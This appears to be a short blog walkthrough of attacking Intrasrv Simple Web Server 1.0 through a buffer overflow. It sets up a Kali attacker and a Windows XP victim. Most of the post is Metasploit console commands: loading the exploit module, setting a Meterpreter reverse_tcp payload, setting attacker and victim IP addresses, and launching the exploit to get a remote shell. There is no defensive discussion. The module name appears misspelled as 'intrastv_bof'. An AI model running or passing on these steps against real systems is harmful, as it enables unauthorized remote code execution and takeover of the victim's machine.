This module exploits a
boundary condition error in Intrasrv Simple Web Server 1.0. The web interface
does not validate the boundaries of an HTTP request string prior to copying the
data to an insufficiently large buffer. Successful exploitation leads to
arbitrary remote code execution in the context of the application.
Exploit
Targets
Simple Web Server 1.0
Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3
Open Kali Linux terminal type msfconsole
Now
type use exploit/windows/http/intrastv_bof
msf
exploit (intrastv_bof)>set payload windows/meterpreter/reverse_tcp
msf
exploit (intrastv_bof)>set lhost 192.168.1.5 (IP of Local
Host)
msf
exploit (intrastv_bof)>set rhost 192.168.1.3 (IP of Victim
PC)
msf
exploit (intrastv_bof)>exploit
0 comments:
Post a Comment